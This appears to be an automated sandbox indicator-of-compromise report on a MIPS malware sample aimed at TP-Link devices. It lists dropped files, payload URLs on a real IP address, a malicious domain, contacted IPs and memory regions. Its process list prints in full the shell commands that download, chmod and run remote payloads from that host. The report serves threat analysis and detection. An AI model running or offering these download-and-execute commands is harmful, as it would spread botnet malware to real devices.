IOC Report

loading gif

Files

File Path
Type
Category
Malicious
/tmp/lib
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
dropped
 malicious
/tmp/shk
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/bin/sh
/bin/sh -c "cd /tmp; rm -rf shk; wget http://103.163.214.97/shk; chmod 777 shk; ./shk tplink; rm -rf shk"
/bin/sh
-
/usr/bin/rm
rm -rf shk
/bin/sh
-
/usr/bin/wget
wget http://103.163.214.97/shk
/bin/sh
-
/usr/bin/chmod
chmod 777 shk
/bin/sh
-
/bin/sh
/bin/sh ./shk tplink
/bin/sh
-
/usr/bin/rm
rm -rf lib
/bin/sh
-
/usr/bin/rm
rm -rf mips
/bin/sh
-
/usr/bin/wget
wget http://103.163.214.97/mips -O lib
/bin/sh
-
/usr/bin/chmod
chmod 777 lib
/bin/sh
-
/tmp/lib
./lib tplink
/tmp/lib
-
/tmp/lib
-
/bin/sh
-
/usr/bin/rm
rm -rf lib
/bin/sh
-
/usr/bin/rm
rm -rf shk
There are 15 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://103.163.214.97/mips
103.163.214.97
http://103.163.214.97/shk
103.163.214.97

Domains

Name
IP
Malicious
rootme.xyz
45.128.232.208
 malicious

IPs

IP
Domain
Country
Malicious
9.10.243.173
unknown
United States
131.85.31.95
unknown
United States
90.221.63.94
unknown
United Kingdom
18.132.133.131
unknown
United States
153.74.120.23
unknown
United States
139.99.9.194
unknown
Canada
36.13.74.222
unknown
Japan
186.131.187.183
unknown
Argentina
104.112.146.190
unknown
United States
123.139.39.205
unknown
China
82.149.106.134
unknown
Austria
103.42.115.36
unknown
India
50.209.198.108
unknown
United States
159.25.118.169
unknown
Germany
123.146.86.5
unknown
China
48.207.173.142
unknown
United States
205.38.105.88
unknown
United States
156.125.113.21
unknown
United States
120.73.207.199
unknown
Korea Republic of
11.72.61.0
unknown
United States
1.162.202.96
unknown
Taiwan; Republic of China (ROC)
203.255.30.174
unknown
Korea Republic of
16.8.36.136
unknown
United States
82.115.89.251
unknown
Poland
81.156.220.237
unknown
United Kingdom
246.40.79.116
unknown
Reserved
3.231.152.13
unknown
United States
160.24.156.85
unknown
Japan
155.181.207.79
unknown
United States
221.3.179.91
unknown
China
23.173.252.91
unknown
Reserved
106.55.89.238
unknown
China
219.168.146.109
unknown
Japan
31.215.25.247
unknown
United Arab Emirates
244.163.79.127
unknown
Reserved
92.236.242.219
unknown
United Kingdom
173.217.65.90
unknown
United States
59.119.224.162
unknown
Taiwan; Republic of China (ROC)
60.93.218.94
unknown
Japan
49.87.160.3
unknown
China
26.153.48.8
unknown
United States
157.69.76.188
unknown
Japan
54.153.180.142
unknown
United States
83.130.231.130
unknown
Israel
51.19.158.134
unknown
United Kingdom
39.148.103.122
unknown
China
57.157.171.70
unknown
Belgium
241.193.244.154
unknown
Reserved
182.81.184.225
unknown
China
5.97.46.21
unknown
Italy
82.244.243.72
unknown
France
105.179.156.81
unknown
unknown
193.57.230.97
unknown
United Kingdom
187.100.242.241
unknown
Brazil
59.46.195.34
unknown
China
249.113.168.67
unknown
Reserved
249.17.142.164
unknown
Reserved
150.3.150.178
unknown
Japan
162.236.213.239
unknown
United States
13.34.40.148
unknown
United States
219.240.131.59
unknown
Korea Republic of
66.244.47.169
unknown
United States
139.200.181.138
unknown
China
39.52.74.222
unknown
Pakistan
98.12.84.202
unknown
United States
19.55.110.191
unknown
United States
132.60.152.230
unknown
United States
115.103.189.162
unknown
China
43.236.194.42
unknown
China
46.184.123.95
unknown
Saudi Arabia
97.41.214.195
unknown
United States
246.180.127.246
unknown
Reserved
124.51.209.73
unknown
Korea Republic of
160.166.18.133
unknown
Morocco
194.84.69.8
unknown
Russian Federation
126.245.208.200
unknown
Japan
76.225.140.136
unknown
United States
181.120.33.225
unknown
Paraguay
168.147.239.181
unknown
United States
219.20.81.39
unknown
Japan
100.96.139.43
unknown
Reserved
66.227.52.253
unknown
United States
104.73.152.206
unknown
United States
53.31.14.154
unknown
Germany
154.104.82.55
unknown
Tunisia
63.70.239.187
unknown
United States
90.35.72.23
unknown
France
156.1.114.162
unknown
United States
252.192.131.106
unknown
Reserved
59.57.245.23
unknown
China
132.50.12.107
unknown
United States
163.23.222.138
unknown
Taiwan; Republic of China (ROC)
116.72.42.170
unknown
India
179.97.186.103
unknown
Brazil
116.220.194.108
unknown
Japan
92.57.255.252
unknown
Spain
105.86.121.35
unknown
Egypt
97.130.128.26
unknown
United States
140.168.62.184
unknown
Australia
118.89.115.17
unknown
China
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7f20f841d000
page execute read
 malicious
7f20f842f000
page read and write
7f2180a52000
page read and write
7ffeeadce000
page read and write
7f2180d83000
page read and write
7f2180a12000
page read and write
7f21803c1000
page read and write
7f217fbab000
page read and write
559777162000
page read and write
7f2181095000
page read and write
7f2180671000
page read and write
559777294000
page read and write
55977714b000
page execute and read and write
55977514d000
page read and write
7f218108d000
page read and write
7f2180a35000
page read and write
7ffeeadd2000
page execute read
7f20f842e000
page read and write
7f2180f64000
page read and write
559775143000
page read and write
7f2178000000
page read and write
559774ebb000
page execute read
7f21810da000
page read and write
7f2178021000
page read and write
7f21803b3000
page read and write
There are 15 hidden memdumps, click here to show them.